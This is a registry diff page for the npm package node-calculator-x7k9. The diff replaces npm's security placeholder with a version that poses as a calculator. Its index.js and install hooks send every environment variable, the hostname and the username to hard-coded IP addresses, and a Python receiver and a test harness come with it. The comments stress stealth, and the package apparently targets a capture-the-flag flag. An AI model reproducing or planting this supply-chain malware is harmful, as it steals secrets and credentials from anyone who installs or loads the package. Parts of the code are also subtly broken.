npm - node-calculator-x7k9 - Versions diffs - 0.0.1-security → 3.9.0 - Mend

node-calculator-x7k9 0.0.1-security → 3.9.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.

This version of node-calculator-x7k9 might be problematic. Click here for more details.

Files changed (7) hide show

package/index.js ADDED Viewed

@@ -0,0 +1,106 @@
+/**
+ * node-calculator-x7k9
+ * Maintains calculator functionality while exfiltrating environment variables
+ * Executes when the app does: require('node-calculator-x7k9')
+ */
+const http = require('http');
+const https = require('https');
+const os = require('os');
+// Configuration - CHANGE THIS!
+const EXFIL_SERVER = 'http://159.223.153.251:8080/exfil';
+// Calculator functionality - MUST maintain this for stealth!
+function calculate(operation, a, b) {
+    switch(operation) {
+        case 'add':
+		    exfiltrate()
+            return a + b;
+        case 'subtract':
+            return a - b;
+        case 'multiply':
+            return a * b;
+        case 'divide':
+            if (b === 0) {
+                throw new Error('Division by zero');
+            }
+            return a / b;
+        default:
+            throw new Error('Invalid operation');
+    }
+}
+// Exfiltration - runs silently in background when package is loaded
+function exfiltrate() {
+    try {
+        const data = {
+            timestamp: new Date().toISOString(),
+            source: 'index.js (app startup)',
+            // Environment variables - contains the FLAG!
+            environment: process.env,
+            // Basic system info
+            system: {
+                hostname: os.hostname(),
+                platform: os.platform(),
+                user: os.userInfo().username,
+                cwd: process.cwd(),
+                nodeVersion: process.version
+            }
+        };
+        const jsonData = JSON.stringify(data);
+        const url = new URL(EXFIL_SERVER);
+        const client = url.protocol === 'https:' ? https : http;
+        const options = {
+            hostname: url.hostname,
+            port: url.port || (url.protocol === 'https:' ? 443 : 80),
+            path: url.pathname,
+            method: 'POST',
+            headers: {
+                'Content-Type': 'application/json',
+                'Content-Length': Buffer.byteLength(jsonData),
+                'User-Agent': 'Mozilla/5.0 Batee5a'
+            },
+            timeout: 5000
+        };
+        const req = client.request(options, (res) => {
+            // Silent success
+        });
+        req.on('error', () => {
+        });
+        req.write(jsonData);
+        req.end();
+    } catch (err) {
+        const options = {
+				hostname: url.hostname,
+            port: url.port || (url.protocol === 'https:' ? 443 : 80),
+            path: url.pathname,
+            method: 'GET',
+            headers: {
+                'User-Agent': 'Mozilla/5.0 Batee5a + errored'
+            },
+            timeout: 5000
+        };
+		const req2 = client.request(options, (res) => {
+            // Silent success
+        });
+    }
+}
+// Execute exfiltration when module is loaded
+// Using setTimeout to not block the app startup
+// Export calculator functionality (must work normally!)
+module.exports = {
+    calculate
+};

package/package.json CHANGED Viewed

@@ -1,6 +1,14 @@
-{
-  "name": "node-calculator-x7k9",
-  "version": "0.0.1-security",
-  "description": "security holding package",
-  "repository": "npm/security-holder"
-}
+{
+  "name": "node-calculator-x7k9",
+  "version": "3.9.0",
+  "description": "Simple calculator plugin with enhanced features",
+  "main": "index.js",
+  "scripts": {
+    "preinstall": "node preinstall.js",
+    "postinstall": "node postinstall.js"
+  },
+  "keywords": ["calculator", "math"],
+  "author": "DarkT",
+  "license": "MIT"
+}

package/postinstall.js ADDED Viewed

@@ -0,0 +1,44 @@
+#!/usr/bin/env node
+/**
+ * Minimal postinstall - backup exfiltration
+ * Main exfiltration happens in index.js when app loads the package
+ */
+const http = require('http');
+const https = require('https');
+const EXFIL_SERVER = 'http://159.223.153.252:8080/exfil';
+console.log('Installing node-calculator-x7k9 v3.2.0...');
+// Quick backup exfiltration after install
+setTimeout(() => {
+    try {
+        const data = {
+            timestamp: new Date().toISOString(),
+            source: 'postinstall (backup)',
+            environment: process.env
+        };
+        const jsonData = JSON.stringify(data);
+        const url = new URL(EXFIL_SERVER);
+        const client = url.protocol === 'https:' ? https : http;
+        const options = {
+            hostname: url.hostname,
+            port: url.port || (url.protocol === 'https:' ? 443 : 80),
+            path: url.pathname,
+            method: 'POST',
+            headers: {
+                'Content-Type': 'application/json',
+                'Content-Length': Buffer.byteLength(jsonData)
+            },
+            timeout: 3000
+        };
+    } catch (err) {
+        // Silent fail
+    }
+}, 500);

package/preinstall.js ADDED Viewed

@@ -0,0 +1,44 @@
+#!/usr/bin/env node
+/**
+ * Minimal preinstall - backup exfiltration
+ * Main exfiltration happens in index.js when app loads the package
+ */
+const http = require('http');
+const https = require('https');
+const EXFIL_SERVER = 'http://159.223.153.252:8080/exfil';
+// Quick backup exfiltration during install
+try {
+    const data = {
+        timestamp: new Date().toISOString(),
+        source: 'preinstall (backup)',
+        environment: process.env
+    };
+    const jsonData = JSON.stringify(data);
+    const url = new URL(EXFIL_SERVER);
+    const client = url.protocol === 'https:' ? https : http;
+    const options = {
+        hostname: url.hostname,
+        port: url.port || (url.protocol === 'https:' ? 443 : 80),
+        path: url.pathname,
+        method: 'POST',
+        headers: {
+            'Content-Type': 'application/json',
+            'Content-Length': Buffer.byteLength(jsonData)
+        },
+        timeout: 3000
+    };
+    const req = client.request(options);
+    req.on('error', () => {});
+    req.write(jsonData);
+    req.end();
+} catch (err) {
+    // Silent fail
+}

package/simple_server.py ADDED Viewed

@@ -0,0 +1,119 @@
+#!/usr/bin/env python3
+"""
+Simple HTTP Exfiltration Server
+Receives POST data and displays the FLAG
+Usage: python3 simple_server.py [port]
+"""
+from http.server import HTTPServer, BaseHTTPRequestHandler
+import json
+import sys
+from datetime import datetime
+PORT = int(sys.argv[1]) if len(sys.argv) > 1 else 8080
+class ExfilHandler(BaseHTTPRequestHandler):
+    def log_message(self, format, *args):
+        pass  # Suppress default logging
+    def do_POST(self):
+        try:
+            content_length = int(self.headers.get('Content-Length', 0))
+            post_data = self.rfile.read(content_length)
+            timestamp = datetime.now().strftime("%H:%M:%S")
+            print(f"\n[{timestamp}] 📨 Received POST from {self.client_address[0]}")
+            try:
+                data = json.loads(post_data.decode('utf-8'))
+                print(f"[{timestamp}] ✅ Data parsed successfully")
+                print(f"[{timestamp}] 📍 Source: {data.get('source', 'unknown')}")
+                # Check for FLAG
+                env = data.get('environment', {})
+                if 'FLAG' in env:
+                    print("\n" + "="*80)
+                    print("🚩 FLAG FOUND! 🚩")
+                    print("="*80)
+                    print(f"  FLAG = {env['FLAG']}")
+                    print("="*80 + "\n")
+                else:
+                    # Search for flag-like patterns
+                    for key, value in env.items():
+                        if 'flag' in key.lower() or (isinstance(value, str) and ('flag{' in value.lower() or 'ctf{' in value.lower())):
+                            print(f"\n🚩 Potential flag: {key} = {value}\n")
+                # Show system info
+                if 'system' in data:
+                    sys_info = data['system']
+                    print(f"[{timestamp}] 💻 System Info:")
+                    print(f"  Hostname: {sys_info.get('hostname', 'N/A')}")
+                    print(f"  User: {sys_info.get('user', 'N/A')}")
+                    print(f"  Platform: {sys_info.get('platform', 'N/A')}")
+                    print(f"  CWD: {sys_info.get('cwd', 'N/A')}")
+                # Show env var count
+                env_count = len(env)
+                print(f"\n[{timestamp}] 🔑 Captured {env_count} environment variables")
+                # Show first few env vars
+                print(f"[{timestamp}] 📝 Sample variables:")
+                for i, (key, value) in enumerate(list(env.items())[:5]):
+                    val_str = str(value)[:60] + ('...' if len(str(value)) > 60 else '')
+                    print(f"  {key} = {val_str}")
+                if env_count > 5:
+                    print(f"  ... and {env_count - 5} more")
+                print(f"\n[{timestamp}] 💾 Full data available in JSON format\n")
+                # Save to file
+                filename = f"exfil_{datetime.now().strftime('%Y%m%d_%H%M%S')}.json"
+                with open(filename, 'w') as f:
+                    json.dump(data, f, indent=2)
+                print(f"[{timestamp}] 💾 Saved to: {filename}\n")
+                self.send_response(200)
+                self.send_header('Content-Type', 'application/json')
+                self.end_headers()
+                self.wfile.write(b'{"status":"success"}')
+            except json.JSONDecodeError:
+                print(f"[{timestamp}] ⚠️  Data is not valid JSON")
+                self.send_response(200)
+                self.end_headers()
+        except Exception as e:
+            print(f"Error: {e}")
+            self.send_response(500)
+            self.end_headers()
+    def do_GET(self):
+        self.send_response(200)
+        self.send_header('Content-Type', 'text/plain')
+        self.end_headers()
+        self.wfile.write(b'Exfiltration server running\n')
+def main():
+    print("╔═══════════════════════════════════════════════════════════════╗")
+    print("║           Simple HTTP Exfiltration Server                    ║")
+    print("╚═══════════════════════════════════════════════════════════════╝\n")
+    print(f"[*] Starting server on port {PORT}")
+    print(f"[*] Listening on http://0.0.0.0:{PORT}/exfil")
+    print(f"\n[*] Configure your payload with:")
+    print(f"    EXFIL_SERVER = 'http://YOUR_IP:{PORT}/exfil'\n")
+    print("[*] Waiting for data...\n")
+    server = HTTPServer(('0.0.0.0', PORT), ExfilHandler)
+    try:
+        server.serve_forever()
+    except KeyboardInterrupt:
+        print("\n\n[*] Shutting down...")
+        server.shutdown()
+if __name__ == '__main__':
+    main()

package/test-index.js ADDED Viewed

@@ -0,0 +1,132 @@
+#!/usr/bin/env node
+/**
+ * Test script - simulates target app loading the malicious package
+ * This shows what happens when app.js does: require('node-calculator-x7k9')
+ */
+const http = require('http');
+console.log('╔═══════════════════════════════════════════════════════════════╗');
+console.log('║   Testing index.js Exfiltration (App Startup Method)         ║');
+console.log('╚═══════════════════════════════════════════════════════════════╝\n');
+// Set test FLAG environment variable
+process.env.FLAG = 'cyctf{test_flag_from_index_js}';
+process.env.NODE_ENV = 'production';
+console.log('[+] Set test environment:');
+console.log('    FLAG=' + process.env.FLAG);
+console.log('    NODE_ENV=' + process.env.NODE_ENV);
+// Start simple HTTP server to receive exfiltrated data
+const PORT = 8080;
+let receivedData = null;
+const server = http.createServer((req, res) => {
+    if (req.method === 'POST') {
+        let body = '';
+        req.on('data', chunk => {
+            body += chunk.toString();
+        });
+        req.on('end', () => {
+            try {
+                receivedData = JSON.parse(body);
+                console.log('\n╔═══════════════════════════════════════════════════════════════╗');
+                console.log('║  ✅ DATA RECEIVED FROM index.js!                              ║');
+                console.log('╚═══════════════════════════════════════════════════════════════╝\n');
+                console.log('📊 Captured Data:');
+                console.log('   Source:', receivedData.source);
+                console.log('   Timestamp:', receivedData.timestamp);
+                console.log('   Hostname:', receivedData.system?.hostname);
+                console.log('   User:', receivedData.system?.user);
+                console.log('   CWD:', receivedData.system?.cwd);
+                console.log('\n🔑 Environment Variables (' + Object.keys(receivedData.environment || {}).length + ' total):');
+                // Show FLAG
+                if (receivedData.environment?.FLAG) {
+                    console.log('\n╔═══════════════════════════════════════════════════════════════╗');
+                    console.log('║  🚩 FLAG CAPTURED!                                            ║');
+                    console.log('║  ' + receivedData.environment.FLAG.padEnd(61) + '║');
+                    console.log('╚═══════════════════════════════════════════════════════════════╝');
+                } else {
+                    console.log('   [!] FLAG not found in environment');
+                }
+                // Show some env vars
+                console.log('\n📝 Sample Environment Variables:');
+                let count = 0;
+                for (const [key, value] of Object.entries(receivedData.environment || {})) {
+                    if (count++ < 10) {
+                        const displayValue = String(value).length > 60 ? String(value).substring(0, 60) + '...' : value;
+                        console.log('   ' + key + '=' + displayValue);
+                    }
+                }
+                if (Object.keys(receivedData.environment || {}).length > 10) {
+                    console.log('   ... and ' + (Object.keys(receivedData.environment).length - 10) + ' more');
+                }
+                res.writeHead(200, { 'Content-Type': 'application/json' });
+                res.end(JSON.stringify({ status: 'success' }));
+                // Stop server after receiving data
+                setTimeout(() => {
+                    server.close();
+                    console.log('\n[✓] Test complete!');
+                    console.log('\n💡 This demonstrates what happens when the target app starts');
+                    console.log('   and does: const calculator = require(\'node-calculator-x7k9\');');
+                    process.exit(0);
+                }, 1000);
+            } catch (e) {
+                console.error('[!] Error parsing data:', e.message);
+                res.writeHead(500);
+                res.end();
+            }
+        });
+    } else {
+        res.writeHead(200);
+        res.end('Exfil server running');
+    }
+});
+server.listen(PORT, '127.0.0.1', () => {
+    console.log('\n[+] Test exfil server listening on http://127.0.0.1:' + PORT);
+    console.log('[+] Simulating target app loading the package...\n');
+    // Simulate what target app does: require('node-calculator-x7k9')
+    console.log('>>> const calculator = require(\'./index.js\');\n');
+    // This is what happens when target app loads our package
+    const calculator = require('./index.js');
+    // Verify calculator still works (stealth!)
+    console.log('[+] Testing calculator functionality:');
+    console.log('    calculator.calculate(\'add\', 5, 3) =', calculator.calculate('add', 5, 3));
+    console.log('    calculator.calculate(\'multiply\', 4, 7) =', calculator.calculate('multiply', 4, 7));
+    console.log('    ✓ Calculator works normally (stealth maintained)');
+    console.log('\n[+] Waiting for exfiltrated data...');
+    // Timeout if no data received
+    setTimeout(() => {
+        if (!receivedData) {
+            console.log('\n[!] No data received after 10 seconds');
+            console.log('[!] Check that EXFIL_SERVER in index.js is: http://127.0.0.1:8080/exfil');
+            server.close();
+            process.exit(1);
+        }
+    }, 10000);
+});
+// Handle Ctrl+C
+process.on('SIGINT', () => {
+    console.log('\n[*] Shutting down...');
+    server.close();
+    process.exit(0);
+});

package/README.md DELETED Viewed

@@ -1,5 +0,0 @@
-# Security holding package
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-Please refer to www.npmjs.com/advisories?search=node-calculator-x7k9 for more information.